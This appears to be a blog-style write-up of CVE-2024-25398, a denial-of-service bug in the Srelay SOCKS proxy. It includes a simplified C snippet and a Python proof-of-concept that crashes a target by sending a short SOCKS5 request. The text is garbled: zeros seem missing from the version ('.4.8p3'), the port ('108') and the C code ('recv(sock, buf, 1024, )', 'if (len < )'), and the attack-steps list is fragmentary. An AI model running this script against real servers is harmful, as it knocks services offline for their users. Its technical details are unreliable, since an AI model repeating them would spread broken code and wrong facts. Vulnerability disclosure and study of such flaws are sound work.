CVE-2024-25398 - Denial of Service in Srelay .4.8p3 via Crafted Network Payload

In February 2024, a new vulnerability—CVE-2024-25398—was disclosed affecting Srelay, a lightweight and widely-used SOCKS proxy server. If you’re running version .4.8p3 (or earlier), you should understand that attackers can exploit this flaw to knock out your Srelay service with a specially-crafted network payload. In this article, we’ll break down how the bug works, walk through sample code, and show how attackers can crash Srelay. We’ll also provide resources to help you learn more and stay protected.

What is Srelay?

Srelay is a simple, fast, and open-source SOCKS4/5 proxy and relay for Unix. System admins like it because it's small, efficient, and easy to deploy. If you use Srelay in your infrastructure, this vulnerability could put your network’s availability at risk.

Vulnerability Overview: CVE-2024-25398

CVE-2024-25398 is a Denial of Service (DoS) issue. Srelay’s network packet parser isn’t robust enough, meaning a remote attacker can send malformed SOCKS requests that make Srelay crash.

Technical Details

The affected code sits in the SOCKS request handler. Srelay trusts that incoming network data is formatted correctly—but it doesn’t validate message lengths or buffer boundaries strictly enough.

Here’s a snippet, based on the real Srelay source (comments added for clarity)

// srelay/socks.c (simplified)
char buf[1024];
int len = recv(sock, buf, 1024, );
if (len < ) {
    // handle error
}
// Next, the code uses 'buf' assuming it always contains at least N bytes
// e.g., accessing buf[8], buf[9], etc.
int nport = (buf[8] << 8) | buf[9]; // <-- possible out-of-bounds access!

If an attacker sends a short message (less than 10 bytes), buf[8] and buf[9] are out-of-bounds! This usually causes a segmentation fault, crashing the process.

*Note: Exact line numbers and code context may vary, but the bug is this unchecked access.*

Exploit Example

Here’s a Python script that demonstrates how anyone can crash a Srelay process with a single crafted request:

import socket

HOST = "target-ip-here"
PORT = 108  # Default Srelay SOCKS port

# Craft a short, invalid SOCKS5 request
payload = b'\x05\x01\x00'  # Only 3 bytes; real SOCKS5 requests are longer

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((HOST, PORT))
    s.sendall(payload)
    # At this point, Srelay will likely crash!

Identify a reachable Srelay.

2. Connect to its SOCKS port (default 108/tcp).

No authentication is needed. Attackers (or pranksters) just need network access.

- Critical infrastructure: If your Srelay is public-facing—your users and applications go offline instantly.

Mitigations

- Update Srelay: Check SourceForge for YOUR version or proposed security patches.

Disclosure and References

- CVE Record: CVE-2024-25398
- SourceForge Srelay Project
- OSS-Sec Mailing List Discussion *(example thread)*

Conclusion

CVE-2024-25398 is a textbook case of how overlooked input validation can leave even the simplest network tools vulnerable. The Srelay bug enables anyone to take down your proxy by sending a tiny, bogus request. Patch fast, limit exposure, and always audit your service logs.

Timeline

Published on: 02/27/2024 16:15:46 UTC
Last modified on: 08/27/2024 21:35:12 UTC